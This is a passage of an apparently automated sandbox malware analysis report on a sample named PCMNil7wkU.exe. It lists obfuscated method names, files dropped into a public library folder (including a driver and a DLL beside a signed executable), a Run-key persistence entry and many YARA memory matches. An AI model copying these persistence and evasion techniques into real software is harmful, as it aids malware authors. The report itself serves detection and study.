              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04107534 push 04107576h; ret 0_2_0410756E
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0413B654 push ecx; mov dword ptr [esp], ecx0_2_0413B658
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 't5P0LU3uvStaN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 't5P0LU3uvStaN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 't5P0LU3uvStaN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 't5P0LU3uvStaN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 't5P0LU3uvStaN', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeFile created: C:\Users\Public\Libraries\Akaelkov.PIFJump to dropped file
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeFile created: C:\Users\Public\Libraries\vokleakA.pifJump to dropped file
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeFile created: C:\Users\Public\Libraries\truesight.sysJump to behavior
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeFile created: C:\Users\Public\Libraries\Akaelkov.PIFJump to dropped file
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeFile created: C:\Users\Public\Libraries\vokleakA.pifJump to dropped file
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeFile created: C:\Users\Public\Libraries\truesight.sysJump to dropped file
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeFile created: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeFile created: C:\Users\Public\Libraries\netutils.dllJump to dropped file

              Boot Survival

              barindex
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AkaelkovJump to behavior
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AkaelkovJump to behavior
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0414224C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,0_2_0414224C
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0412AEA0 IsIconic,GetWindowPlacement,GetWindowRect,0_2_0412AEA0
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04141018 IsIconic,GetCapture,0_2_04141018
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0415319C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,0_2_0415319C
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0414FCD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,0_2_0414FCD8
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_041538CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,0_2_041538CC
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04141920 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,0_2_04141920
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04153990 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,0_2_04153990
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040B224C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,5_2_040B224C
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040B1018 IsIconic,GetCapture,5_2_040B1018
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040C319C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,5_2_040C319C
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040BFCD8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,5_2_040BFCD8
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040C38CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,5_2_040C38CC
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040B1920 IsIconic,SetWindowPos,GetWindowPlacement,5_2_040B1920
              Source: C:\Users\Public\Libraries\Akaelkov.PIFCode function: 5_2_040C3990 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,5_2_040C3990
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04158820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_04158820
              Source: C:\Users\Public\Libraries\vokleakA.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\vokleakA.pifProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
